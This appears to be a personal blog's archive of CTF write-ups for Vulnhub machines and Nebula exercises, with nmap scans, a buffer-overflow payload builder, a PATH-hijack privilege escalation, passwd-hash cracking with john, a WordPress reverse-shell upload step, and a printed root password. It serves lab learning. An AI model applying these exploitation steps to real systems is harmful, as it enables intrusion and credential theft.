Posts

Showing posts from 2018

Vulnhub - Pinky's palace.

From now on I'll do something different. Instead of presenting the whole solution, I'll write down what I really learnt from the machine I'm hacking, because that matters more to me than just handing you the complete write-up, which you can find in every corner of the internet. Much appreciated. Let's start: on this machine I learnt how to find the functions inside a binary using objdump. First I looked at the strings, and I found execv, which led me to look for the functions inside the binary with objdump -d -M ...:
-d disassembles the executable sections
-M passes options to the disassembler (for example -M intel for Intel syntax; the lowercase -m is the flag that selects the machine architecture)
After seeing that, I opened the binary in gdb, set a breakpoint on main, ran it, and did disas spawn. I had to confirm whether ASLR is enabled; it isn't, so every address stays where it is and won't change between runs! So I built a file with the address from the picture above: you need 72 characters of padding and then the address. Can you see 000055555555447d0? That is the first address of the spawn function. Let's run ...

Vulnhub - Pwnlab.

This machine was nice. I learnt something new: remote file inclusion. There are many examples on Google; google it. Let's start:

# Nmap 7.60 scan initiated Sun Feb 18 12:37:05 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.23
Nmap scan report for 10.0.2.23
Host is up (0.00014s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4      111/tcp   rpcbind
|   100000  2,3,4      111/udp   rpcbind
|   100024  1        37405/udp   status
|_  100024  1        49755/tcp   status
3306/tcp open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info:
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 38
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, ConnectWithDatabase, LongPassword, SupportsL...

Vulnhub - Tr0ll.

This machine was not easy. I had to have a little patience, because when you think you're going somewhere, you're not. It trolled me all the time. Let's start:

# Nmap 7.60 scan initiated Sat Feb 24 11:50:53 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.10
Nmap scan report for 10.0.2.10
Host is up (0.00017s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.0.2.21
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2...

Vulnhub - Bob1.

This machine was cool, and it was hard; it took many hours to solve. Let's start:

# Nmap 7.60 scan initiated Fri Mar 16 20:11:28 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.31
Nmap scan report for 10.0.2.31
Host is up (0.00014s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD 1.3.5b
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
|   2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
|   256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_  256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (EdDSA)
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:l...

Vulnhub - Covfefe.

This VM is cool. They always are. Let's start:

# Nmap 7.60 scan initiated Tue Feb 20 16:04:52 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.24
Nmap scan report for 10.0.2.24
Host is up (0.00021s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
|   2048 d0:6a:10:e0:fb:63:22:be:09:96:0b:71:6a:60:ad:1a (RSA)
|   256 ac:2c:11:1e:e2:d6:26:ea:58:c4:3e:2d:3e:1e:dd:96 (ECDSA)
|_  256 13:b3:db:c5:af:62:c2:b1:60:7d:2f:48:ef:c3:13:fc (EdDSA)
80/tcp    open  http    nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Welcome to nginx!
31337/tcp open  http    Werkzeug httpd 0.11.15 (Python 3.5.3)
| http-robots.txt: 3 disallowed entries
|_/.bashrc /.profile /taxes
|_http-server-header: Werkzeug/0.11.15 Python/3.5.3
|_http-title: 404 Not Found
MAC Address: 08:00:27:EC:98:F3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection pe...

Vulnhub - hackfest2016: Sedna.

On this VM the first foothold was hard to find, but it was cool.

# Nmap 7.60 scan initiated Sat Feb 17 20:04:07 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.20
Nmap scan report for 10.0.2.20
Host is up (0.00019s latency).
Not shown: 65523 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
|   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|   256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
|_  256 ca:36:3c:32:e6:24:f9:b7:b4:d4:1d:fc:c0:da:10:96 (EdDSA)
53/tcp  open  domain  ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp  open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3    Dovecot pop3d
|_p...

Vulnhub - droopy-v02,143.

This machine is truly nice. I had never seen a Drupal panel before; I'm a WordPress user. Let's go:

# Nmap 7.60 scan initiated Sat Feb 17 18:25:25 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.6
Nmap scan report for 10.0.2.6
Host is up (0.00031s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | l'imp\xC3\xB4t que les pa...
MAC Address: 08:00:27:F6:2F:97 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https:...

Vulnhub - SpyderSec

This VM seems easy, but it's not. First of all, nmap, which shows only Apache open:

# Nmap 7.25BETA2 scan initiated Mon Feb 12 10:41:15 2018 as: nmap -p- -sC -sV -oN nmap.txt 10.0.2.17
Nmap scan report for 10.0.2.17
Host is up (0.00038s latency).
Not shown: 65533 filtered ports
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd
|_http-server-header: Apache
|_http-title: SpyderSec | Challenge
MAC Address: 08:00:27:56:11:10 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 12 10:43:49 2018 -- 1 IP address (1 host up) scanned in 154.36 seconds

After that, I ran dirb; nothing useful there either:

DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Feb 15 13:16:34 2018
URL_BASE: http://10.0.2.17/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
-----------------
GENERATED WORDS: 20458 ...

Nebula Exercises - LEVEL 01.

This exercise WAS TRULY useful when I was solving some CTFs, like these: Touhid, Ew-skuzzy and NullByte.

About: There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

Solution:
cp /bin/getflag echo
chmod 777 echo
export PATH=.:${PATH}
/home/flag01/flag01
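As an added example, which is not part of the Nebula exercise or of this post, here is a small Python model of why the solution above works: flag01 ends up running echo through a PATH lookup, and export PATH=.:${PATH} puts a directory you control in front of the system directories, so your echo is the one found first. The script plants its own fake echo in a temporary directory that it creates and removes itself; every file and directory name in it is the example's own, not something from the exercise.

```python
import os
import stat
import tempfile
from typing import List, Optional, Tuple

# Added example, not part of the Nebula exercise or of this post. flag01 ends
# up running "echo" through a PATH lookup, so the solution above works by
# putting a directory you control ("." via export PATH=.:${PATH}) ahead of
# /bin in that search. This script builds its own fake echo in a temporary
# directory; every path it creates is the example's own, not from the exercise.

EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


def resolve(name: str, path_env: str) -> Optional[str]:
    """First executable called `name` along path_env, searched left to right
    the way env/execvp do. An empty entry ("a::b", a leading or trailing ":")
    means the current directory, the same hazard as an explicit ".".
    Executability is judged from the mode bits only; a real exec would also
    fail on a noexec mount, which this model ignores."""
    for entry in path_env.split(os.pathsep):
        directory = entry if entry else "."
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.stat(candidate).st_mode & EXEC_BITS:
            return candidate
    return None


def unsafe_entries(path_env: str) -> List[str]:
    """PATH entries a setuid program must never trust: relative or empty ones."""
    return [e for e in path_env.split(os.pathsep) if not os.path.isabs(e)]


def demo_path_hijack(target: str = "echo") -> Tuple[str, Optional[str], Optional[str]]:
    """Plant a fake `target`, prepend its directory to PATH like the solution's
    export PATH=.:${PATH}, and return (planted file, lookup before, lookup after)."""
    with tempfile.TemporaryDirectory() as work:
        fake = os.path.join(work, target)
        with open(fake, "w") as fh:                   # stands in for cp /bin/getflag echo
            fh.write("#!/bin/sh\necho hijacked\n")
        os.chmod(fake, 0o755)                         # the chmod step
        system_path = "/usr/bin:/bin"
        hijacked_path = work + os.pathsep + system_path
        return fake, resolve(target, system_path), resolve(target, hijacked_path)


if __name__ == "__main__":
    fake, before, after = demo_path_hijack()
    print("echo before hijack:", before)
    print("echo after hijack: ", after, "(planted:", fake + ")")
    print("untrusted entries in '.:/usr/bin::/bin':", unsafe_entries(".:/usr/bin::/bin"))
```

unsafe_entries is the defensive side of the same lesson: a setuid program should ignore the caller's PATH and invoke its helpers by absolute path, and any audit of a PATH string should flag relative or empty entries, since an empty entry is searched as the current directory exactly like ".".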

Vulnhub - NullByte

This VM was really cool. I learnt a lot. Shall we begin?

# Nmap 7.25BETA2 scan initiated Wed Feb 14 09:44:05 2018 as: nmap -sC -sV -oN nmap.txt 10.0.2.12
Nmap scan report for 10.0.2.12
Host is up (0.00017s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4      111/tcp   rpcbind
|   100000  2,3,4      111/udp   rpcbind
|   100024  1        36739/tcp   status
|_  100024  1        52615/udp   status
777/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
|   2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|_  256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
MAC Address: 08:00:27:FE:89:AF (Oracle VirtualBox virtual NIC) ...

Vulnhub - Ew-Skuzzy.

This VM was awesome. It was cool because I had to remember some concepts about file inclusion. First of all, this VM took a lot of time: it was difficult, and I had to install two tools, one of which turned out not to be a requirement at all. Let's begin!

# Nmap 7.25BETA2 scan initiated Mon Feb 12 19:17:00 2018 as: nmap -sC -sV -oN nmap.txt 10.0.2.18
Nmap scan report for 10.0.2.18
Host is up (0.00015s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 89:c2:ae:12:d6:c5:19:4e:68:4a:28:e9:06:bd:9c:19 (RSA)
|_  256 f0:0c:ae:37:10:d3:6d:a2:85:3a:77:04:06:94:f8:0a (ECDSA)
80/tcp   open  http    nginx
|_http-server-header: nginx
|_http-title: Welcome!
3260/tcp open  iscsi?
|_iscsi-info: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:60:88:83 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection perf...

Quaoar

Extremely easy machine. Check robots.txt: you're going to find /wordpress/. Check WordPress for default credentials, like admin:admin. Upload your reverse shell, by using a plugin or by editing a file like header.php. Access the machine:

$ pwd
/var/www/wordpress/
$ cat wp-config.php
$ su - root
Password: rootpassword!
root@Quaoar:~# ls
flag.txt  vmware-tools-distrib
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb

Hacking Day - Albania

This machine was cool. I liked it. Let's start: I used netdiscover to find the IP address, which was 10.0.2.13. With nmap I can see SSH, and Apache on 8008:

# Nmap 7.25BETA2 scan initiated Sat Feb 10 11:07:17 2018 as: nmap -sC -sV -oN nmap.txt 10.0.2.13
Nmap scan report for 10.0.2.13
Host is up (0.00018s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HackDay Albania 2...

Nebula exercises - LEVEL06

This exercise was really important for solving a problem in a Vulnhub CTF (Capture the Flag).

About: The flag06 account credentials came from a legacy unix system. To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

If you look into this link, you're going to see that on such a system the password hash is stored in the second field of /etc/passwd.

Solution:
cat /etc/passwd | grep flag06
Then crack that hash with john on Kali Linux (the password is hello).

You're going to use this piece of information, that passwd itself can store password hashes, in the Albania VM.
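As an added example that is not from the exercise or this post, here is a Python audit that does what the grep above does by hand, over a whole passwd file: it reports every account whose second field still holds a password hash (or is empty) instead of the x that points to /etc/shadow, and emits those accounts in the user:hash form john takes. The sample passwd lines, including every hash value in them, are constructed for this example; none of them is the real flag06 entry.

```python
import re
from typing import List, Optional, Tuple

# Added example, not from the Nebula exercise or this post. It automates the
# level06 observation: on a legacy system the second field of /etc/passwd holds
# the password hash itself instead of "x" (which means "see /etc/shadow").
# SAMPLE_PASSWD and every hash value in it are constructed for this example;
# none of the lines is the real flag06 entry.

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
level06:x:1006:1006::/home/level06:/bin/sh
flag06:aB3/cD9.eF1gH:993:993::/home/flag06:/bin/sh
legacy:$1$saltsalt$0123456789abcdefghijkl:1500:1500::/home/legacy:/bin/sh
guest::1600:1600::/home/guest:/bin/sh
"""

DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")      # traditional crypt(3): 2-char salt + 11 chars
MODULAR_CRYPT = re.compile(r"^\$([^$]+)\$")         # $1$ md5, $5$ sha256, $6$ sha512, $y$ yescrypt, $2b$ bcrypt


def classify_password_field(field: str) -> Optional[str]:
    """Name the problem with one passwd password field, or None if it is fine."""
    if field == "x":
        return None                                # hash lives in /etc/shadow
    if field in ("*", "!", "!!"):
        return None                                # locked, no password login
    if field == "":
        return "empty password"                    # login without any password
    if field.startswith("!"):                      # locked, but the hash is still there to crack
        inner = classify_password_field(field[1:])
        return "locked, " + inner if inner else None
    if DES_CRYPT.match(field):
        return "DES crypt hash"
    m = MODULAR_CRYPT.match(field)
    if m:
        return "modular crypt hash ($%s$)" % m.group(1)
    return "unrecognised value"


def find_legacy_credentials(passwd_text: str) -> List[Tuple[str, str, str]]:
    """(user, finding, field) for every passwd line whose second field is not a
    shadow pointer or a lock marker; comments and malformed lines are skipped."""
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:                       # not a passwd entry
            continue
        user, pw_field = fields[0], fields[1]
        finding = classify_password_field(pw_field)
        if finding is not None:
            findings.append((user, finding, pw_field))
    return findings


def john_input(findings: List[Tuple[str, str, str]]) -> str:
    """user:hash lines for john (john --format=descrypt for the 13-char ones)."""
    return "\n".join("%s:%s" % (user, field)
                     for user, finding, field in findings if "hash" in finding)


if __name__ == "__main__":
    for user, finding, field in find_legacy_credentials(SAMPLE_PASSWD):
        print("%-10s %-32s %s" % (user, finding, field))
    print(john_input(find_legacy_credentials(SAMPLE_PASSWD)))
```

Run it against a real file with find_legacy_credentials(open("/etc/passwd").read()); anything it returns is a finding, because a modern system should only ever show x, or a lock marker, in that field.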

Vulnhub - Mr. Robot

This machine is based on the TV series of the same name. I didn't know that, but I had to learn a little bit about the show; you're going to see why. Let's start. First of all, as always, nmap:

# Nmap 7.25BETA2 scan initiated Fri Feb 9 20:23:22 2018 as: nmap -sC -sV -oN nmap.txt 10.0.2.16
Nmap scan report for 10.0.2.16
Host is up (0.00035s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:23:51:A8 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb ...

Vulnhub: Fristileaks - 1.3

This one was interesting for me. I already knew the IP address, so no netdiscover was necessary. Nmap gave me only port 80 to work with. Nothing fancy, I know, but I think that was the right path into this machine. It was interesting because, I believe, it worked on a concept that was new to me: security through obscurity. It had a hidden URL that cannot be seen by dirb or nikto, and robots.txt only sent me to pages that contained nothing but an image. Very funny, though. After trying everything, I found this URL: frist. It had an admin portal. If you run curl, you're going to find an image in base64, which can be decoded here; this is a password (keKkeKKeKKeKkEkkEk). And you're going to see the user in a comment, which is eezeepz. At least, you think it's the user, and you're right. The comment goes: "I left some junk here to make testing easier. By eezeepz." Something similar happened in Bulldog-1. The guy left a comment with the pa...

Usefull tool - address2hex.py.

I didn't develop it, but I find it truly useful for converting an address to its hex byte form (Address2hex.py). I was working through Protostar, and it helped me a lot. The two videos below show you what little endian is. It's useful to know when we're talking about writing exploits.

user@protostar:~$ python address2hex.py 08048424
RET address: 08048424
Converted reverseHex value: \x24\x84\x04\x08
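As an added example, which is neither the address2hex.py script from this post nor anything from the Pinky's Palace binary, here is the same little-endian conversion written out in Python, together with the "padding, then address" payload layout described in the Pinky's Palace post above. The 72-byte offset and the spawn address 0x55555555447d are taken from that post; the function names and the ASLR helper are this example's own.

```python
import struct

# Added example: not the address2hex.py from the post, and not code from the
# Pinky's Palace binary. It shows the little-endian conversion the tool does,
# plus the "padding, then address" payload layout used against spawn().
# The 72-byte offset and the spawn address 0x55555555447d are taken from the
# Pinky's Palace post; function names are this example's own.


def reverse_hex(addr_hex, width=4):
    """Address (hex string) -> \\x-escaped little-endian bytes, like address2hex.py.

    width is the pointer size: 4 for a 32-bit target such as Protostar,
    8 for a 64-bit target such as Pinky's Palace.
    """
    value = int(addr_hex, 16)
    if value >= 1 << (8 * width):
        raise ValueError("%s does not fit in %d bytes" % (addr_hex, width))
    return "".join("\\x%02x" % b for b in value.to_bytes(width, "little"))


def build_payload(padding_len, ret_addr, width=8, filler=b"A"):
    """Padding up to the saved return address, then the address to return into.

    padding_len is the distance from the buffer start to the saved return
    address (72 in the post), normally found by crashing the binary under gdb.
    """
    fmt = {4: "<I", 8: "<Q"}[width]          # little-endian unsigned int / long long
    return filler * padding_len + struct.pack(fmt, ret_addr)


def payload_has_null(payload):
    """True if the payload contains a NUL byte. A user-space 64-bit address
    always packs to two trailing zero bytes: they survive read() on stdin but
    stop argv and strcpy-style copies at the first NUL."""
    return b"\x00" in payload


def aslr_state(randomize_va_space):
    """Meaning of the value in /proc/sys/kernel/randomize_va_space on the target."""
    return {
        "0": "disabled",
        "1": "stack, mmap and VDSO randomized",
        "2": "full: stack, mmap, VDSO and brk randomized",
    }[randomize_va_space.strip()]


if __name__ == "__main__":
    print(reverse_hex("08048424"))                     # Protostar example from the post
    spawn = 0x55555555447D                             # spawn() address from the post
    payload = build_payload(72, spawn, width=8)
    print(len(payload), payload_has_null(payload))
    with open("payload.bin", "wb") as fh:              # ./binary < payload.bin
        fh.write(payload)
```

Two checks worth doing before trusting a fixed address like the one in the post: gdb turns randomization off for the program it debugs by default (set disable-randomization), so an address that is stable inside gdb proves nothing about the target; read /proc/sys/kernel/randomize_va_space on the machine itself, which aslr_state interprets. And once packed, a user-space 64-bit address ends in two zero bytes; feeding the file through read() on stdin keeps them, while argv and strcpy-style copies stop at the first NUL, so check how the binary consumes its input before blaming the offset.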

Nebula - Exercises.

Today I decided to do something different. I remember that a long time ago I saw the website Exploit-Exercises. I thought it would be cool to solve those problems, because I could run into them on other Vulnhub machines, and I was right. But first of all, to make things easy: you have to access this machine over ssh in order to have a proper terminal to work in, so generate the SSH host key on the VM first:

ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key

Now you can go in: ssh level00@ipaddress, password level00. First exercise: This level requires you to find a Set User ID program that will run as the "flag00" account. First of all, what is set-user-ID, or suid, as I came to learn later? The video below gives you a start on that subject. To sum it up: it's a permission bit that makes a program run with the privileges of the file's owner instead of the user who launched it. When it comes to binaries like a C program, this can be dangerous: it can lead to privilege escalation. Another great example is this: If you can, give the authors a thumbs up on YouTube, ...

Zico_2

This one, zico2-1,210, was truly interesting; with a little more effort than the first time, I got to the flag. Let's start:

netdiscover -r 10.0.2.4/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.0.2.1        52:54:00:12:35:00      1      60  Unknown vendor
 10.0.2.2        52:54:00:12:35:00      1      60  Unknown vendor ...